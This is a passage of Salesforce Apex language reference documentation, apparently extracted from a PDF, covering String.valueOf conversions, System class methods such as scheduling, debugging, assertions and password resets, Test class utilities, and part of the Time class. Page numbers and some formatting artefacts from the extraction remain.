public static String valueOf(Datetime datetimeToConvert)
1788
Reference
String Class
Parameters
datetimeToConvert
Type: Datetime
Return Value
Type: String
Example
DateTime dt = datetime.newInstance(1996, 6, 23);
String sDateTime = String.valueOf(dt);
System.assertEquals('1996-06-23 00:00:00', sDateTime);
valueOf(Decimal)
Returns a String that represents the specified Decimal.
Signature
public static String valueOf(Decimal decimalToConvert)
Parameters
decimalToConvert
Type: Decimal
Return Value
Type: String
Example
Decimal dec = 3.14159265;
String sDecimal = String.valueOf(dec);
System.assertEquals('3.14159265', sDecimal);
valueOf(Double)
Returns a String that represents the specified Double.
Signature
public static String valueOf(Double doubleToConvert)
Parameters
doubleToConvert
Type: Double
1789
Reference
String Class
Return Value
Type: String
Example
Double myDouble = 12.34;
String myString =
String.valueOf(myDouble);
System.assertEquals(
'12.34', myString);
valueOf(Integer)
Returns a String that represents the specified Integer.
Signature
public static String valueOf(Integer integerToConvert)
Parameters
integerToConvert
Type: Integer
Return Value
Type: String
Example
Integer myInteger = 22;
String sInteger = String.valueOf(myInteger);
System.assertEquals('22', sInteger);
valueOf(Long)
Returns a String that represents the specified Long.
Signature
public static String valueOf(Long longToConvert)
Parameters
longToConvert
Type: Long
Return Value
Type: String
1790
Reference
String Class
Example
Long myLong = 123456789;
String sLong = String.valueOf(myLong);
System.assertEquals('123456789', sLong);
valueOf(Object)
Returns a string representation of the specified object argument.
Signature
public static String valueOf(Object toConvert)
Parameters
toConvert
Type: Object
Return Value
Type: String
Usage
If the argument is not a String, the valueOf method converts it into a String by calling the toString method on the argument,
if available, or any overridden toString method if the argument is a user-defined type. Otherwise, if no toString method is
available, it returns a String representation of the argument.
Example
List<Integer> ls =
new List<Integer>();
ls.add(10);
ls.add(20);
String strList =
String.valueOf(ls);
System.assertEquals(
'(10, 20)', strList);
valueOfGmt(Datetime)
Returns a String that represents the specified Datetime in the standard yyyy-MM-dd HH:mm:ss format for the GMT time zone.
Signature
public static String valueOfGmt(Datetime datetimeToConvert)
1791
Reference
System Class
Parameters
datetimeToConvert
Type: Datetime
Return Value
Type: String
Example
// For a PST timezone:
DateTime dt = datetime.newInstance(2001, 9, 14);
String sDateTime = String.valueOfGmt(dt);
System.assertEquals('2001-09-14 07:00:00', sDateTime);
System Class
Contains methods for system operations, such as writing debug messages and scheduling jobs.
Namespace
System
System Methods
The following are methods for System. All methods are static.
IN THIS SECTION:
abortJob(String)
Stops the specified job. The stopped job is still visible in the job queue in the Salesforce user interface.
assert(Boolean, Object)
Asserts that the specified condition is true. If it is not, a fatal error is returned that causes code execution to halt.
assertEquals(Object, Object, Object)
Asserts that the first two arguments are the same. If they are not, a fatal error is returned that causes code execution to halt.
assertNotEquals(Object, Object, Object)
Asserts that the first two arguments are different. If they are the same, a fatal error is returned that causes code execution to halt.
currentPageReference()
Returns a reference to the current page. This is used with Visualforce pages.
currentTimeMillis()
Returns the current time in milliseconds, which is expressed as the difference between the current time and midnight, January 1,
1970 UTC.
debug(Object)
Writes the specified message, in string format, to the execution debug log. The DEBUG log level is used.
1792
Reference
System Class
debug(LoggingLevel, Object)
Writes the specified message, in string format, to the execution debug log with the specified log level.
enqueueJob(Object)
Adds a job to the Apex job queue that corresponds to the specified queueable class and returns the job ID.
equals(Object, Object)
Returns true if both arguments are equal. Otherwise, returns false.
getApplicationReadWriteMode()
Returns the read write mode set for an organization during Salesforce.com upgrades and downtimes.
hashCode(Object)
Returns the hash code of the specified object.
isBatch()
Returns true if the currently executing code is invoked by a batch Apex job; false otherwise.
isFuture()
Returns true if the currently executing code is invoked by code contained in a method annotated with future; false
otherwise.
isScheduled()
Returns true if the currently executing code is invoked by a scheduled Apex job; false otherwise.
now()
Returns the current date and time in the GMT time zone.
process(List<Ids>, String, String, String)
Processes the list of work item IDs.
purgeOldAsyncJobs(Date)
Deletes asynchronous Apex job records for jobs that have finished execution before the specified date with a Completed, Aborted,
or Failed status, and returns the number of records deleted.
requestVersion()
Returns a two-part version that contains the major and minor version numbers of a package.
resetPassword(ID, Boolean)
Resets the password for the specified user.
runAs(System.Version)
Changes the current package version to the package version specified in the argument.
runAs(User)
Changes the current user to the specified user.
schedule(String, String, Object)
Use schedule with an Apex class that implements the Schedulable interface to schedule the class to run at the time specified
by a Cron expression.
scheduleBatch(Database.Batchable, String, Integer)
Schedules a batch job to run once in the future after the specified time interval and with the specified job name.
scheduleBatch(Database.Batchable, String, Integer, Integer)
Schedules a batch job to run once in the future after the specified the time interval, with the specified job name and scope size.
Returns the scheduled job ID (CronTrigger ID).
1793
Reference
System Class
setPassword(ID, String)
Sets the password for the specified user.
submit(List<ID>, String, String)
Submits the processed approvals. The current user is the submitter and the entry criteria is evaluated for all processes applicable to
the current user.
today()
Returns the current date in the current user's time zone.
abortJob(String)
Stops the specified job. The stopped job is still visible in the job queue in the Salesforce user interface.
Signature
public static Void abortJob(String Job_ID)
Parameters
Job_ID
Type: String
The Job_ID is the ID associated with either AsyncApexJob or CronTrigger.
Return Value
Type: Void
Usage
The following methods return the job ID that can be passed to abortJob.
System.schedule methodreturns the CronTrigger object ID associated with the scheduled job as a string.
SchedulableContext.getTriggerId methodreturns the CronTrigger object ID associated with the scheduled job as
a string.
getJobId methodreturns the AsyncApexJob object ID associated with the batch job as a string.
Database.executeBatch methodreturns the AsyncApexJob object ID associated with the batch job as a string.
assert(Boolean, Object)
Asserts that the specified condition is true. If it is not, a fatal error is returned that causes code execution to halt.
Signature
public static Void assert(Boolean condition, Object opt_msg)
Parameters
condition
Type: Boolean
1794
Reference
System Class
opt_msg
Type: Object
(Optional) Custom message returned as part of the error message.
Return Value
Type: Void
Usage
You cant catch an assertion failure using a try/catch block even though it is logged as an exception.
Signature
public static Void assertEquals(Object expected, Object actual, Object opt_msg)
Parameters
expected
Type: Object
Specifies the expected value.
actual
Type: Object
Specifies the actual value.
opt_msg
Type: Object
(Optional) Custom message returned as part of the error message.
Return Value
Type: Void
Usage
You cant catch an assertion failure using a try/catch block even though it is logged as an exception.
Signature
public static Void assertNotEquals(Object expected, Object actual, Object opt_msg)
1795
Reference
System Class
Parameters
expected
Type: Object
Specifies the expected value.
actual
Type: Object
Specifies the actual value.
opt_msg
Type: Object
(Optional) Custom message returned as part of the error message.
Return Value
Type: Void
Usage
You cant catch an assertion failure using a try/catch block even though it is logged as an exception.
currentPageReference()
Returns a reference to the current page. This is used with Visualforce pages.
Signature
public static System.PageReference currentPageReference()
Return Value
Type: System.PageReference
Usage
For more information, see PageReference Class.
currentTimeMillis()
Returns the current time in milliseconds, which is expressed as the difference between the current time and midnight, January 1, 1970
UTC.
Signature
public static Long currentTimeMillis()
Return Value
Type: Long
1796
Reference
System Class
debug(Object)
Writes the specified message, in string format, to the execution debug log. The DEBUG log level is used.
Signature
public static Void debug(Object msg)
Parameters
msg
Type: Object
Return Value
Type: Void
Usage
If the msg argument is not a string, the debug method calls String.valueOf to convert it into a string. The String.valueOf
method calls the toString method on the argument, if available, or any overridden toString method if the argument is a
user-defined type. Otherwise, if no toString method is available, it returns a string representation of the argument.
If the log level for Apex Code is set to DEBUG or higher, the message of this debug statement will be written to the debug log.
Note that when a map or set is printed, the output is sorted in key order and is surrounded with square brackets ([]). When an array or
list is printed, the output is enclosed in parentheses (()).
Note: Calls to System.debug are not counted as part of Apex code coverage.Calls to System.debug are not counted as part
of Apex code coverage.
For more information on log levels, see Setting Debug Log Filters in the Salesforce online help.
debug(LoggingLevel, Object)
Writes the specified message, in string format, to the execution debug log with the specified log level.
Signature
public static Void debug(LoggingLevel logLevel, Object msg)
Parameters
logLevel
Type: System.LoggingLevel
The logging level to set for this method.
msg
Type: Object
The message or object to write in string format to the execution debug log.
1797
Reference
System Class
Return Value
Type: Void
Usage
If the msg argument is not a string, the debug method calls String.valueOf to convert it into a string. The String.valueOf
method calls the toString method on the argument, if available, or any overridden toString method if the argument is a
user-defined type. Otherwise, if no toString method is available, it returns a string representation of the argument.
Note: Calls to System.debug are not counted as part of Apex code coverage.
For more information on log levels, see Setting Debug Log Filters in the Salesforce online help.
enqueueJob(Object)
Adds a job to the Apex job queue that corresponds to the specified queueable class and returns the job ID.
Signature
public static ID enqueueJob(Object queueableObj)
Parameters
queueableObj
Type: Object
An instance of the class that implements the Queueable Interface.
1798
Reference
System Class
Return Value
Type: ID
The job ID, which corresponds to the ID of an AsyncApexJob record.
Usage
To add a job for asynchronous execution, call System.enqueueJob by passing in an instance of your class implementation of the
Queueable interface for execution as follows:
ID jobID = System.enqueueJob(new MyQueueableClass());
equals(Object, Object)
Returns true if both arguments are equal. Otherwise, returns false.
Signature
public static Boolean equals(Object obj1, Object obj2)
Parameters
obj1
Type: Object
Object being compared.
obj2
Type: Object
Object to compare with the first argument.
Return Value
Type: Boolean
Usage
obj1 and obj2 can be of any type. They can be values, or object references, such as sObjects and user-defined types.
The comparison rules for System.equals are identical to the ones for the == operator. For example, string comparison is case
insensitive. For information about the comparison rules, see the == operator.
getApplicationReadWriteMode()
Returns the read write mode set for an organization during Salesforce.com upgrades and downtimes.
Signature
public static System.ApplicationReadWriteMode getApplicationReadWriteMode()
Return Value
Type: System.ApplicationReadWriteMode
1799
Reference
System Class
Usage
getApplicationReadWriteMode is available as part of 5 Minute Upgrade.
hashCode(Object)
Returns the hash code of the specified object.
Signature
public static Integer hashCode(Object obj)
Parameters
obj
Type: Object
The object to get the hash code for. This parameter can be of any type, including values or object references, such as sObjects or
user-defined types.
Return Value
Type: Boolean
1800
Reference
System Class
isBatch()
Returns true if the currently executing code is invoked by a batch Apex job; false otherwise.
Signature
public static Boolean isBatch()
Return Value
Type: Boolean
Usage
Since a future method can't be invoked from a batch Apex job, use this method to check if the currently executing code is a batch Apex
job before you invoke a future method.
isFuture()
Returns true if the currently executing code is invoked by code contained in a method annotated with future; false otherwise.
Signature
public static Boolean isFuture()
Return Value
Type: Boolean
Usage
Since a future method can't be invoked from another future method, use this method to check if the current code is executing within
the context of a future method before you invoke a future method.
isScheduled()
Returns true if the currently executing code is invoked by a scheduled Apex job; false otherwise.
Signature
public static Boolean isScheduled()
Return Value
Type: Boolean
now()
Returns the current date and time in the GMT time zone.
1801
Reference
System Class
Signature
public static Datetime now()
Return Value
Type: Datetime
Signature
public static List<Id> process(List<Id> WorkItemIDs, String Action, String Comments,
String NextApprover)
Parameters
WorkItemIDs
Type: List<Id>
Action
Type: String
Comments
Type: String
NextApprover
Type: String
Return Value
Type: List<Id>
purgeOldAsyncJobs(Date)
Deletes asynchronous Apex job records for jobs that have finished execution before the specified date with a Completed, Aborted, or
Failed status, and returns the number of records deleted.
Signature
public static Integer purgeOldAsyncJobs(Date dt)
Parameters
dt
Type: Date
Specifies the date up to which old records are deleted. The date comparison is based on the CompletedDate field of AsyncApexJob,
which is in the GMT time zone.
1802
Reference
System Class
Return Value
Type: Integer
Usage
Asynchronous Apex job records are records in AsyncApexJob.
The system cleans up asynchronous job records for jobs that have finished execution and are older than seven days. You can use this
method to further reduce the size of AsyncApexJob by cleaning up more records.
Each execution of this method counts as a single row against the governor limit for DML statements.
Example
This example shows how to delete all job records for jobs that have finished before todays date.
Integer count = System.purgeOldAsyncJobs
(Date.today());
System.debug('Deleted ' +
count + ' old jobs.');
requestVersion()
Returns a two-part version that contains the major and minor version numbers of a package.
Signature
public static System.Version requestVersion()
Return Value
Type: System.Version
Usage
Using this method, you can determine the version of an installed instance of your package from which the calling code is referencing
your package. Based on the version that the calling code has, you can customize the behavior of your package code.
The requestVersion method isnt supported for unmanaged packages. If you call it from an unmanaged package, an exception
will be thrown.
resetPassword(ID, Boolean)
Resets the password for the specified user.
Signature
public static System.ResetPasswordResult resetPassword(ID userID, Boolean
send_user_email)
1803
Reference
System Class
Parameters
userID
Type: ID
send_user_email
Type: Boolean
Return Value
Type: System.ResetPasswordResult
Usage
When the user logs in with the new password, they are prompted to enter a new password, and to select a security question and answer
if they haven't already. If you specify true for send_user_email, the user is sent an email notifying them that their password
was reset. A link to sign onto Salesforce using the new password is included in the email. Use setPassword(ID, String) if you don't want
the user to be prompted to enter a new password when they log in.
Warning: Be careful with this method, and do not expose this functionality to end-users.
runAs(System.Version)
Changes the current package version to the package version specified in the argument.
Signature
public static Void runAs(System.Version version)
Parameters
version
Type: System.Version
Return Value
Type: Void
Usage
A package developer can use Version methods to continue to support existing behavior in classes and triggers in previous package
versions while continuing to evolve the code. Apex classes and triggers are saved with the version settings for each installed managed
package that the class or trigger references.
This method is used for testing your component behavior in different package versions that you upload to the AppExchange. This method
effectively sets a two-part version consisting of major and minor numbers in a test method so that you can test the behavior for different
package versions.
You can only use runAs in a test method. There is no limitation to the number of calls to this method in a transaction. For sample
usage of this method, see Testing Behavior in Package Versions.
1804
Reference
System Class
runAs(User)
Changes the current user to the specified user.
Signature
public static Void runAs(User user_var)
Parameters
user_var
Type: User
Return Value
Type: Void
Usage
All of the specified user's record sharing is enforced during the execution of runAs. You can only use runAs in a test method. For
more information, see Using the runAs Method on page 428.
Note: The runAs method ignores user license limits. You can create new users with runAs even if your organization has no
additional user licenses.
The runAs method implicitly inserts the user that is passed in as parameter if the user has been instantiated, but not inserted yet.
You can also use runAs to perform mixed DML operations in your test by enclosing the DML operations within the runAs block. In
this way, you bypass the mixed DML error that is otherwise returned when inserting or updating setup objects together with other
sObjects. See sObjects That Cannot Be Used Together in DML Operations.
Note: Every call to runAs counts against the total number of DML statements issued in the process.
Signature
public static String schedule(String JobName, String CronExpression, Object
schedulable_class)
Parameters
JobName
Type: String
CronExpression
Type: String
schedulable_class
Type: Object
1805
Reference
System Class
Return Value
Type: String
Returns the scheduled job ID (CronTrigger ID).
Usage
Use extreme care if youre planning to schedule a class from a trigger. You must be able to guarantee that the trigger wont add more
scheduled classes than the 100 that are allowed. In particular, consider API bulk updates, import wizards, mass record changes through
the user interface, and all cases where more than one record can be updated at a time. Use the abortJob method to stop the job
after it has been scheduled.
Note: Salesforce schedules the class for execution at the specified time. Actual execution may be delayed based on service
availability.
Note: Salesforce schedules the class for execution at the specified time. Actual execution may be delayed based on service
availability.
The System.Schedule method uses the user's timezone for the basis of all schedules.
The following are the values for the expression:
Name
Values
Special Characters
Seconds
059
None
Minutes
059
None
Hours
023
, - * /
Day_of_month
131
, - * ? / L W
Month
, - * /
JAN
FEB
MAR
APR
MAY
JUN
1806
Reference
Name
System Class
Values
Special Characters
JUL
AUG
SEP
OCT
NOV
DEC
Day_of_week
17 or the following:
, - * ? / L #
SUN
MON
TUE
WED
THU
FRI
SAT
optional_year
null or 19702099
, - * /
Description
Delimits values. For example, use JAN, MAR, APR to specify more than one month.
Specifies a range. For example, use JAN-MAR to specify more than one month.
Specifies all values. For example, if Month is specified as *, the job is scheduled for
every month.
Specifies increments. The number before the slash specifies when the intervals will
begin, and the number after the slash is the interval amount. For example, if you specify
1/5 for Day_of_month, the Apex class runs every fifth day of the month, starting
on the first of the month.
Specifies the end of a range (last). This is only available for Day_of_month and
Day_of_week. When used with Day of month, L always means the last day
of the month, such as January 31, February 28 for leap years, and so on. When used
with Day_of_week by itself, it always means 7 or SAT. When used with a
Day_of_week value, it means the last of that type of day in the month. For example,
if you specify 2L, you are specifying the last Monday of the month. Do not use a range
of values with L as the results might be unexpected.
1807
Reference
System Class
Special Character
Description
Specifies the nearest weekday (Monday-Friday) of the given day. This is only available
for Day_of_month. For example, if you specify 20W, and the 20th is a Saturday,
the class runs on the 19th. If you specify 1W, and the first is a Saturday, the class does
not run in the previous month, but on the third, which is the following Monday.
Tip: Use the L and W together to specify the last weekday of the month.
Specifies the nth day of the month, in the format weekday#day_of_month.
This is only available for Day_of_week. The number before the # specifies weekday
(SUN-SAT). The number after the # specifies the day of the month. For example,
specifying 2#2 means the class runs on the second Monday of every month.
Description
0 0 13 * * ?
0 0 22 ? * 6L
0 0 10 ? * MON-FRI
0 0 20 * * ? 2010
In the following example, the class proschedule implements the Schedulable interface. The class is scheduled to run at 8 AM,
on the 13th of February.
proschedule p = new proschedule();
String sch = '0 0 8 13 2 ?';
system.schedule('One Time Pro', sch, p);
Signature
public static String scheduleBatch(Database.Batchable batchable, String jobName, Integer
minutesFromNow)
Parameters
batchable
Type: Database.Batchable
An instance of a class that implements the Database.Batchable interface.
jobName
Type: String
1808
Reference
System Class
Type: Integer
The time interval in minutes after which the job should start executing. This argument must be greater than zero.
Return Value
Type: String
The scheduled job ID (CronTrigger ID).
Usage
Note: Some things to note about System.scheduleBatch:
When you call System.scheduleBatch, Salesforce schedules the job for execution at the specified time. Actual execution
might be delayed based on service availability.
The scheduler runs as systemall classes are executed, whether or not the user has permission to execute the class.
All scheduled Apex limits apply for batch jobs scheduled using System.scheduleBatch. After the batch job starts
executing, all batch job limits apply and the job no longer counts toward scheduled Apex limits.
After calling this method and before the batch job starts, you can use the returned scheduled job ID to abort the scheduled
job using the System.abortJob method.
For an example, see Using the System.scheduleBatch Method.
Signature
public static String scheduleBatch(Database.Batchable batchable, String jobName, Integer
minutesFromNow, Integer scopeSize)
Parameters
batchable
Type: Database.Batchable
The batch class that implements the Database.Batchable interface.
jobName
Type: String
The name of the job that this method will start.
minutesFromNow
Type: Integer
The time interval in minutes after which the job should start executing.
scopeSize
Type: Integer
1809
Reference
System Class
The number of records that should be passed to the batch execute method.
Return Value
Type: String
Usage
Note: Some things to note about System.scheduleBatch:
When you call System.scheduleBatch, Salesforce schedules the job for execution at the specified time. Actual execution
might be delayed based on service availability.
The scheduler runs as systemall classes are executed, whether or not the user has permission to execute the class.
All scheduled Apex limits apply for batch jobs scheduled using System.scheduleBatch. After the batch job starts
executing, all batch job limits apply and the job no longer counts toward scheduled Apex limits.
After calling this method and before the batch job starts, you can use the returned scheduled job ID to abort the scheduled
job using the System.abortJob method.
For an example, see Using the System.scheduleBatch Method.
setPassword(ID, String)
Sets the password for the specified user.
Signature
public static Void setPassword(ID userID, String password)
Parameters
userID
Type: ID
password
Type: String
Return Value
Type: Void
Usage
When the user logs in with this password, they are not prompted to create a new password. Use resetPassword(ID, Boolean) if you want
the user to go through the reset process and create their own password.
Warning: Be careful with this method, and do not expose this functionality to end-users.
1810
Reference
Test Class
Signature
public static List<ID> submit(List<ID> workItemIDs, String Comments, String NextApprover)
Parameters
workItemIDs
Type: List<ID>
Comments
Type: String
NextApprover
Type: String
Return Value
Type: List<ID>
Usage
For enhanced submit and evaluation features, see the ProcessSubmitRequest class.
today()
Returns the current date in the current user's time zone.
Signature
public static Date today()
Return Value
Type: Date
Test Class
Contains methods related to Visualforce tests.
Namespace
System
Test Methods
The following are methods for Test. All methods are static.
IN THIS SECTION:
getStandardPricebookId()
Returns the ID of the standard price book in the organization.
1811
Reference
Test Class
isRunningTest()
Returns true if the currently executing code was called by code contained in a test method, false otherwise. Use this method
if you need to run different code depending on whether it was being called from a test.
loadData(Schema.SObjectType, String)
Inserts test records from the specified static resource .csv file and for the specified sObject type, and returns a list of the inserted
sObjects.
setCurrentPage(PageReference)
A Visualforce test method that sets the current PageReference for the controller.
setCurrentPageReference(PageReference)
A Visualforce test method that sets the current PageReference for the controller.
setFixedSearchResults(ID[])
Defines a list of fixed search results to be returned by all subsequent SOSL statements in a test method.
setMock(Type, Object)
Sets the response mock mode and instructs the Apex runtime to send a mock response whenever a callout is made through the
HTTP classes or the auto-generated code from WSDLs.
setReadOnlyApplicationMode(Boolean)
Sets the application mode for an organization to read-only in an Apex test to simulate read-only mode during Salesforce upgrades
and downtimes. The application mode is reset to the default mode at the end of each Apex test run.
startTest()
Marks the point in your test code when your test actually begins. Use this method when you are testing governor limits.
stopTest()
Marks the point in your test code when your test ends. Use this method in conjunction with the startTest method.
testInstall(InstallHandler, Version, Boolean)
Tests the implementation of the InstallHandler interface, used for specifying a post install script in packages. Tests will run as the test
initiator in the development environment.
testUninstall(UninstallHandler)
Tests the implementation of the UninstallHandler interface, used for specifying an uninstall script in packages. Tests will run as the
test initiator in the development environment.
getStandardPricebookId()
Returns the ID of the standard price book in the organization.
Signature
public static Id getStandardPricebookId()
Return Value
Type: Id
The ID of the standard price book.
1812
Reference
Test Class
Usage
This method returns the ID of the standard price book in your organization regardless of whether the test can query organization data.
By default, tests cant query organization data unless theyre annotated with @isTest(SeeAllData=true).
Creating price book entries with a standard price requires the ID of the standard price book. Use this method to get the standard price
book ID so that you can create price book entries in your tests.
Example
This example creates some test data for price book entries. The test method in this example gets the standard price book ID and uses
this ID to create a price book entry for a product with a standard price. Next, the test creates a custom price book and uses the ID of this
custom price book to add a price book entry with a custom price.
@isTest
public class PriceBookTest {
// Utility method that can be called by Apex tests to create price book entries.
static testmethod void addPricebookEntries() {
// First, set up test price book entries.
// Insert a test product.
Product2 prod = new Product2(Name = 'Laptop X200',
Family = 'Hardware');
insert prod;
// Get standard price book ID.
// This is available irrespective of the state of SeeAllData.
Id pricebookId = Test.getStandardPricebookId();
// 1. Insert a price book entry for the standard price book.
// Standard price book entries require the standard price book ID we got earlier.
PricebookEntry standardPrice = new PricebookEntry(
Pricebook2Id = pricebookId, Product2Id = prod.Id,
UnitPrice = 10000, IsActive = true);
insert standardPrice;
// Create a custom price book
Pricebook2 customPB = new Pricebook2(Name='Custom Pricebook', isActive=true);
insert customPB;
// 2. Insert a price book entry with a custom price.
PricebookEntry customPrice = new PricebookEntry(
Pricebook2Id = customPB.Id, Product2Id = prod.Id,
UnitPrice = 12000, IsActive = true);
insert customPrice;
// Next, perform some tests with your test price book entries.
}
}
isRunningTest()
Returns true if the currently executing code was called by code contained in a test method, false otherwise. Use this method if
you need to run different code depending on whether it was being called from a test.
1813
Reference
Test Class
Signature
public static Boolean isRunningTest()
Return Value
Type: Boolean
loadData(Schema.SObjectType, String)
Inserts test records from the specified static resource .csv file and for the specified sObject type, and returns a list of the inserted sObjects.
Signature
public static List<sObject> loadData(Schema.SObjectType sObjectToken, String
resourceName)
Parameters
sObjectToken
Type: Schema.SObjectType
The sObject type for which to insert test records.
resourceName
Type: String
The static resource that corresponds to the .csv file containing the test records to load. The name is case insensitive.
Return Value
Type: List<sObject>
Usage
You must create the static resource prior to calling this method. The static resource is a comma-delimited file ending with a .csv extension.
The file contains field names and values for the test records. The first line of the file must contain the field names and subsequent lines
are the field values. To learn more about static resources, see Defining Static Resources in the Salesforce online help.
Once you create a static resource for your .csv file, the static resource will be assigned a MIME type. Supported MIME types are:
text/csv
application/vnd.ms-excel
application/octet-stream
text/plain
setCurrentPage(PageReference)
A Visualforce test method that sets the current PageReference for the controller.
Signature
public static Void setCurrentPage(PageReference page)
1814
Reference
Test Class
Parameters
page
Type: System.PageReference
Return Value
Type: Void
setCurrentPageReference(PageReference)
A Visualforce test method that sets the current PageReference for the controller.
Signature
public static Void setCurrentPageReference(PageReference page)
Parameters
page
Type: System.PageReference
Return Value
Type: Void
setFixedSearchResults(ID[])
Defines a list of fixed search results to be returned by all subsequent SOSL statements in a test method.
Signature
public static Void setFixedSearchResults(ID[] opt_set_search_results)
Parameters
opt_set_search_results
Type: ID[]
The list of record IDs specified by opt_set_search_results replaces the results that would normally be returned by the
SOSL queries if they were not subject to any WHERE or LIMIT clauses. If these clauses exist in the SOSL queries, they are applied
to the list of fixed search results.
Return Value
Type: Void
Usage
If opt_set_search_results is not specified, all subsequent SOSL queries return no results.
For more information, see Adding SOSL Queries to Unit Tests on page 430.
1815
Reference
Test Class
setMock(Type, Object)
Sets the response mock mode and instructs the Apex runtime to send a mock response whenever a callout is made through the HTTP
classes or the auto-generated code from WSDLs.
Signature
public static Void setMock(Type interfaceType, Object instance)
Parameters
interfaceType
Type: System.Type
instance
Type: Object
Return Value
Type: Void
Usage
Note: If the code that performs the callout is in a managed package, you must call Test.setMock from a test method in the
same package with the same namespace to mock the callout.
setReadOnlyApplicationMode(Boolean)
Sets the application mode for an organization to read-only in an Apex test to simulate read-only mode during Salesforce upgrades and
downtimes. The application mode is reset to the default mode at the end of each Apex test run.
Signature
public static Void setReadOnlyApplicationMode(Boolean application_mode)
Parameters
application_mode
Type: Boolean
Return Value
Type: Void
Usage
setReadOnlyApplicationMode is available as part of 5 Minute Upgrade. See also the getApplicationReadWriteMode() System
method.
1816
Reference
Test Class
Example
The following example sets the application mode to read only and attempts to insert a new account record, which results in the exception.
It then resets the application mode and performs a successful insert.
@isTest
private class ApplicationReadOnlyModeTestClass {
public static testmethod void test() {
// Create a test account that is used for querying later.
Account testAccount = new Account(Name = 'TestAccount');
insert testAccount;
// Set the application read only mode.
Test.setReadOnlyApplicationMode(true);
// Verify that the application is in read-only mode.
System.assertEquals(
ApplicationReadWriteMode.READ_ONLY,
System.getApplicationReadWriteMode());
// Create a new account object.
Account testAccount2 = new Account(Name = 'TestAccount2');
try {
// Get the test account created earlier. Should be successful.
Account testAccountFromDb =
[SELECT Id, Name FROM Account WHERE Name = 'TestAccount'];
System.assertEquals(testAccount.Id, testAccountFromDb.Id);
// Inserts should result in the InvalidReadOnlyUserDmlException
// being thrown.
insert testAccount2;
System.assertEquals(false, true);
} catch (System.InvalidReadOnlyUserDmlException e) {
// Expected
}
// Insertion should work after read only application mode gets disabled.
Test.setReadOnlyApplicationMode(false);
insert testAccount2;
Account testAccount2FromDb =
[SELECT Id, Name FROM Account WHERE Name = 'TestAccount2'];
System.assertEquals(testAccount2.Id, testAccount2FromDb.Id);
}
}
startTest()
Marks the point in your test code when your test actually begins. Use this method when you are testing governor limits.
Signature
public static Void startTest()
1817
Reference
Test Class
Return Value
Type: Void
Usage
You can also use this method with stopTest to ensure that all asynchronous calls that come after the startTest method are
run before doing any assertions or testing. Each test method is allowed to call this method only once. All of the code before this method
should be used to initialize variables, populate data structures, and so on, allowing you to set up everything you need to run your test.
Any code that executes after the call to startTest and before stopTest is assigned a new set of governor limits.
stopTest()
Marks the point in your test code when your test ends. Use this method in conjunction with the startTest method.
Signature
public static Void stopTest()
Return Value
Type: Void
Usage
Each test method is allowed to call this method only once. Any code that executes after the stopTest method is assigned the original
limits that were in effect before startTest was called. All asynchronous calls made after the startTest method are collected
by the system. When stopTest is executed, all asynchronous processes are run synchronously.
Note: Asynchronous calls, such as @future or executeBatch, called in a startTest, stopTest block, do not count
against your limits for the number of queued jobs.
Signature
public static Void testInstall(InstallHandler installImp, Version ver, Boolean isPush)
Parameters
installImp
Type: System.InstallHandler
A class that implements the InstallHandler interface.
ver
Type: System.Version
The version number of the existing package installed in the subscriber organization.
1818
Reference
Test Class
isPush
Type: Boolean
(Optional) Specifies if the upgrade is a push. Its default value is false.
Return Value
Type: Void
Usage
This method throws a run-time exception if the test install fails.
Example
@isTest static void test() {
PostInstallClass postinstall =
new PostInstallClass();
Test.testInstall(postinstall,
new Version(1,0));
}
testUninstall(UninstallHandler)
Tests the implementation of the UninstallHandler interface, used for specifying an uninstall script in packages. Tests will run as the test
initiator in the development environment.
Signature
public static Void testUninstall(UninstallHandler uninstImp)
Parameters
uninstImp
Type: System.UninstallHandler
A class that implements the UninstallHandler interface.
Return Value
Type: Void
Usage
This method throws a run-time exception if the test uninstall fails.
Example
@isTest static void test() {
UninstallClass uninstall =
new UninstallClass();
1819
Reference
Time Class
Test.testUninstall(uninstall);
}
Time Class
Contains methods for the Time primitive data type.
Namespace
System
Usage
For more information on time, see Primitive Data Types on page 26.
Time Methods
The following are methods for Time.
IN THIS SECTION:
addHours(Integer)
Adds the specified number of hours to a Time.
addMilliseconds(Integer)
Adds the specified number of milliseconds to a Time.
addMinutes(Integer)
Adds the specified number of minutes to a Time.
addSeconds(Integer)
Adds the specified number of seconds to a Time.
hour()
Returns the hour component of a Time.
millisecond()
Returns the millisecond component of a Time.
minute()
Returns the minute component of a Time.
newInstance(Integer, Integer, Integer, Integer)
Constructs a Time from Integer representations of the specified hour, minutes, seconds, and milliseconds.
second()
Returns the second component of a Time.
addHours(Integer)
Adds the specified number of hours to a Time.
1820
Reference
Time Class
Signature
public Time addHours(Integer addlHours)
Parameters
addlHours
Type: Integer
Return Value
Type: Time
Example
Time myTime = Time.newInstance(1, 2, 3, 4);
Time expected = Time.newInstance(4, 2, 3, 4);
System.assertEquals(expected, myTime.addHours(3));
addMilliseconds(Integer)
Adds the specified number of milliseconds to a Time.
Signature
public Time addMilliseconds(Integer addlMilliseconds)
Parameters
addlMilliseconds
Type: Integer
Return Value
Type: Time
Example
Time myTime = Time.newInstance(1, 2, 3, 0);
Time expected = Time.newInstance(1, 2, 4, 400);
System.assertEquals(expected, myTime.addMilliseconds(1400));
addMinutes(Integer)
Adds the specified number of minutes to a Time.
Signature
public Time addMinutes(Integer addlMinutes)
1821
Reference
Time Class
Parameters
addlMinutes
Type: Integer
Return Value
Type: Time
Example
Time myTime = Time.newInstance(18, 30, 2, 20);
Integer myMinutes = myTime.minute();
myMinutes = myMinutes + 5;
System.assertEquals(myMinutes, 35);
addSeconds(Integer)
Adds the specified number of seconds to a Time.
Signature
public Time addSeconds(Integer addlSeconds)
Parameters
addlSeconds
Type: Integer
Return Value
Type: Time
Example
Time myTime = Time.newInstance(1, 2, 55, 0);
Time expected = Time.newInstance(1, 3, 5, 0);
System.assertEquals(expected, myTime.addSeconds(10));
hour()
Returns the hour component of a Time.
Signature
public Integer hour()
Return Value
Type: Integer
1822
Reference
Time Class
Example
Time myTime = Time.newInstance(18, 30, 2, 20);
myTime = myTime.addHours(2);
Integer myHour = myTime.hour();
System.assertEquals(myHour, 20);
millisecond()
Returns the millisecond component of a Time.
Signature
public Integer millisecond()
Return Value
Type: Integer
Example
Time myTime = Time.newInstance(3, 14, 15, 926);
System.assertEquals(926, myTime.millisecond());
minute()
Returns the minute component of a Time.
Signature
public Integer minute()
Return Value
Type: Integer
Example
Time myTime = Time.newInstance(3, 14, 15, 926);
System.assertEquals(14, myTime.minute());
Signature
public static Time newInstance(Integer hour, Integer minutes, Integer seconds, Integer
milliseconds)
1823
Reference
TimeZone Class
